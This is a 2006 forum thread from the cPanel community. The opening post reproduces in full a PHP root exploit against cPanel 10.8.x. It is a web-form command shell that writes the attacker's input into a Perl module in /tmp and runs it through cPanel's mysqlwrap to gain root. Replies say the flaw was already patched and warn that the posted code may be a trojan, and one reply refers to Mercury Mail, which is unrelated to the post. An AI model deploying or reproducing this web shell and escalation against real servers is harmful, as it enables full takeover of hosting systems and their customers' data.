The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

newest exploit?

Discussion in 'General Discussion' started by rustelekom, Oct 14, 2006.

  1. rustelekom

    rustelekom Well-Known Member
    PartnerNOC

    Joined:
    Nov 13, 2003
    Messages:
    290
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    moscow
    original advisory http://www.securitylab.ru/poc/extra/275416.php



    <!- for use old cpanel exploit ( http://www.milw0rm.com/exploits/2466 ) you need have
    <!- bash shell access on victim server but with this new exploit you only need
    <!- to upload php file and run this into browser on victim servers.
    <!- then you have root Access and you can do anything ....
    <!- Coded by nima salehi ( nima@ashiyane.ir )
    <!- Ashiyane Security Corporation www.Ashiyane.ir >
    <title>cPanel <= 10.8.x cpwrap root exploit (PHP)</title>
    <center><img border="2" src="http://www.ashiyane.ir/images/logo.jpg" width="429" height="97"><br><br>
    <?

    if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
    {
    echo "<br><br><br><br><br>Sorry Safe-mode Is On ( Script Not Work On This Server ) <br><br><br><br><br>";
    echo "<br><br><br>Powered By Ashiyane Security Corporation <a href=\"http://www.ashiyane.ir\"> www.Ashiyane.ir";
    exit();
    }

    $disablef = @ini_get("disable_functions");
    if (!empty($disablef))
    {
    $disablef = str_replace(" ","",$disablef);
    $disablef = explode(",",$disablef);
    if (in_array("passthru",$disablef))
    {
    echo "<br><br><br><br><br>Sorry Passthru Is Disable ( Script Not Work On This Server ) <br><br><br><br><br>";
    echo "<br><br><br>Powered By Ashiyane Security Corporation <a href=\"http://www.ashiyane.ir\"> www.Ashiyane.ir";
    exit();
    }
    }

    ?>

    <form method="POST" action="<?php echo $surl; ?>">
    Command : <input type="text" name="c" size="40">
    <input type="submit" value=" Run " name="B1"></form>
    <textarea cols="60" rows="20" readonly>
    <?php
    $cmd=$_POST['c'];
    if ( $cmd != "" )
    {
    $f=fopen("/tmp/strict.pm", "w");
    fputs($f,'system("'.$cmd.'");');
    fclose($f);
    passthru("PERL5LIB=/tmp /usr/local/cpanel/bin/mysqlwrap nima");
    }
    ?>
    </textarea>
    <br>
    Powered By Ashiyane Security Corporation <a href="http://www.ashiyane.ir"> www.Ashiyane.ir
    </center>

    # milw0rm.com [2006-10-13]
     
  2. Murtaza_t

    Murtaza_t Well-Known Member

    Joined:
    Jan 24, 2005
    Messages:
    476
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Earth
    cPanel Access Level:
    Website Owner
    Is this true..? I think cPanel has already dealt with mysqlwrap exploit.. haven't they?
     
  3. pjman

    pjman Well-Known Member

    Joined:
    Mar 22, 2003
    Messages:
    101
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    New York
    Yeah, they did.

    This was 10.8 issue. If you ran a force upcp in the last two weeks, you're in the clear.:eek: It's a local exploit.
     
  4. Spiral

    Spiral BANNED

    Joined:
    Jun 24, 2005
    Messages:
    2,023
    Likes Received:
    7
    Trophy Points:
    0
    It wouldn't even work on a properly secured server and this one is pretty laughable!
     
  5. verdon

    verdon Well-Known Member

    Joined:
    Nov 1, 2003
    Messages:
    836
    Likes Received:
    2
    Trophy Points:
    18
    Location:
    Northern Ontario, Canada
    cPanel Access Level:
    Root Administrator
    That only looks a little suspicious
     
  6. nyjimbo

    nyjimbo Well-Known Member

    Joined:
    Jan 25, 2003
    Messages:
    1,125
    Likes Received:
    0
    Trophy Points:
    36
    Location:
    New York
    Why is a very old exploit being brought up again with references to Mercury Mail, which is NOT something that can even run under unix/Linux or the Cpanel environment?.

    DO NOT run the above "fixes", this thing smells of a trojan horse or some other kind of attempt to fool users into running bad code.

    :mad:
     
Loading...
Similar Threads - newest exploit
  1. zye
    Replies:
    5
    Views:
    314

Share This Page